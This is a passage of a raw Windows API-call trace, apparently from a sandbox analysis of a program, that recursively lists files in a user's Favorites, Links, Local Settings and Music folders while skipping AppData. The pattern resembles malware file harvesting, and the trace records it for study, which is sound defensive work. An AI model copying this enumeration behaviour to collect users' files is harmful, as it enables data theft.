ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="..", cAlternateFileName="")) returned 1 [0157.623] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0157.623] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0157.623] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x8a0000, dwReserved1=0x8a7560, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0157.623] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0157.623] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0157.624] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x11a0069, ftCreationTime.dwLowDateTime=0x4605, ftCreationTime.dwHighDateTime=0x89fe58, ftLastAccessTime.dwLowDateTime=0x773d1ecd, ftLastAccessTime.dwHighDateTime=0x7e8b71, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x120006a, nFileSizeHigh=0x4605, nFileSizeLow=0x2b, dwReserved0=0x8a0000, dwReserved1=0x8a7560, cFileName="\x87\x08", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0 [0157.624] FindClose (in: hFindFile=0x90af18 | out: hFindFile=0x90af18) returned 1 [0157.625] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8a7364, dwReserved1=0x8a7560, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0157.625] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0157.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSN Websites", cchCount1=12, lpString2="AppData", cchCount2=7) returned 3 [0157.625] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.625] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*", lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName=".", cAlternateFileName="")) returned 0x90af18 [0157.628] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="..", cAlternateFileName="")) returned 1 [0157.628] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0157.628] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0157.628] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0157.628] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0157.628] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0157.628] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0157.628] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x11a0069, ftCreationTime.dwLowDateTime=0x468f, ftCreationTime.dwHighDateTime=0x89fe58, ftLastAccessTime.dwLowDateTime=0x773d1ecd, ftLastAccessTime.dwHighDateTime=0x7e8b71, ftLastWriteTime.dwLowDateTime=0x13, ftLastWriteTime.dwHighDateTime=0x110006a, nFileSizeHigh=0x468f, nFileSizeLow=0x8e2ba0, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="MS\x08", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0 [0157.629] FindClose (in: hFindFile=0x90af18 | out: hFindFile=0x90af18) returned 1 [0157.629] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8a7364, dwReserved1=0x8a7560, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0157.629] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0157.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Windows Live", cchCount1=12, lpString2="AppData", cchCount2=7) returned 3 [0157.630] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.630] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*", lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName=".", cAlternateFileName="")) returned 0x90af18 [0157.632] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="..", cAlternateFileName="")) returned 1 [0157.632] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0157.632] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="Windows Live Gallery.url", cAlternateFileName="WINDOW~2.URL")) returned 1 [0157.632] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="Windows Live Mail.url", cAlternateFileName="WINDOW~1.URL")) returned 1 [0157.632] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 1 [0157.632] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x11a0069, ftCreationTime.dwLowDateTime=0x46ff, ftCreationTime.dwHighDateTime=0x89fe58, ftLastAccessTime.dwLowDateTime=0x773d1ecd, ftLastAccessTime.dwHighDateTime=0x7e8b71, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0xf4006a, nFileSizeHigh=0x46ff, nFileSizeLow=0x9ba828, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="Wi\x08", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0 [0157.633] FindClose (in: hFindFile=0x90af18 | out: hFindFile=0x90af18) returned 1 [0157.636] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0xf6007a, ftCreationTime.dwLowDateTime=0x4717, ftCreationTime.dwHighDateTime=0x8a7560, ftLastAccessTime.dwLowDateTime=0x4702, ftLastAccessTime.dwHighDateTime=0x8, ftLastWriteTime.dwLowDateTime=0x356310, ftLastWriteTime.dwHighDateTime=0x130007b, nFileSizeHigh=0x4717, nFileSizeLow=0x8a7250, dwReserved0=0x8a7364, dwReserved1=0x8a7560, cFileName="痠\x8a\x08", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0 [0157.636] FindClose (in: hFindFile=0x90ae58 | out: hFindFile=0x90ae58) returned 1 [0157.636] FindNextFileW (in: hFindFile=0x90ad98, lpFindFileData=0x87eac8 | out: lpFindFileData=0x87eac8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8a7364, dwReserved1=0x8a7560, cFileName="Links", cAlternateFileName="")) returned 1 [0157.636] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0157.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Links", cchCount1=5, lpString2="AppData", cchCount2=7) returned 3 [0157.636] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.636] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*", lpFindFileData=0x87e888 | out: lpFindFileData=0x87e888*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName=".", cAlternateFileName="")) returned 0x90ae58 [0157.640] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e888 | out: lpFindFileData=0x87e888*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="..", cAlternateFileName="")) returned 1 [0157.640] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e888 | out: lpFindFileData=0x87e888*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0157.640] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0157.640] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0157.640] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0157.640] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0xf6007a, ftCreationTime.dwLowDateTime=0x4787, ftCreationTime.dwHighDateTime=0x89fe58, ftLastAccessTime.dwLowDateTime=0x773d1ecd, ftLastAccessTime.dwHighDateTime=0x7e8b71, ftLastWriteTime.dwLowDateTime=0xf, ftLastWriteTime.dwHighDateTime=0xe8007b, nFileSizeHigh=0x4787, nFileSizeLow=0x8e2ba0, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="Re\x08", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0 [0157.640] FindClose (in: hFindFile=0x90ae58 | out: hFindFile=0x90ae58) returned 1 [0157.641] FindNextFileW (in: hFindFile=0x90ad98, lpFindFileData=0x87eac8 | out: lpFindFileData=0x87eac8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x8a7560, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0157.641] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0157.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Local Settings", cchCount1=14, lpString2="AppData", cchCount2=7) returned 3 [0157.641] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.641] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*", lpFindFileData=0x87e888 | out: lpFindFileData=0x87e888*(dwFileAttributes=0x7738e0d2, ftCreationTime.dwLowDateTime=0x9ba768, ftCreationTime.dwHighDateTime=0x60, ftLastAccessTime.dwLowDateTime=0x1, ftLastAccessTime.dwHighDateTime=0x9ba00e, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x854028c, nFileSizeHigh=0x441c, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0xffffffff [0157.641] FindNextFileW (in: hFindFile=0x90ad98, lpFindFileData=0x87eac8 | out: lpFindFileData=0x87eac8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdac52fa0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdac52fa0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x87ed94, dwReserved1=0x8a7560, cFileName="Music", cAlternateFileName="")) returned 1 [0157.642] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0157.642] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music", cchCount1=5, lpString2="AppData", cchCount2=7) returned 3 [0157.642] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.642] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*", lpFindFileData=0x87e888 | out: lpFindFileData=0x87e888*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdac52fa0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdac52fa0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName=".", cAlternateFileName="")) returned 0x90ae58 [0157.642] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e888 | out: lpFindFileData=0x87e888*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdac52fa0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdac52fa0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="..", cAlternateFileName="")) returned 1 [0157.642] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e888 | out: lpFindFileData=0x87e888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3eebe30, ftCreationTime.dwHighDateTime=0x1d5d8ce, ftLastAccessTime.dwLowDateTime=0x63358590, ftLastAccessTime.dwHighDateTime=0x1d5e05d, ftLastWriteTime.dwLowDateTime=0x63358590, ftLastWriteTime.dwHighDateTime=0x1d5e05d, nFileSizeHigh=0x0, nFileSizeLow=0x1318, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="3-CH0vN.m4a", cAlternateFileName="")) returned 1 [0157.642] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0157.642] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c59920, ftCreationTime.dwHighDateTime=0x1d5d8fc, ftLastAccessTime.dwLowDateTime=0x1ccfcb50, ftLastAccessTime.dwHighDateTime=0x1d5e03b, 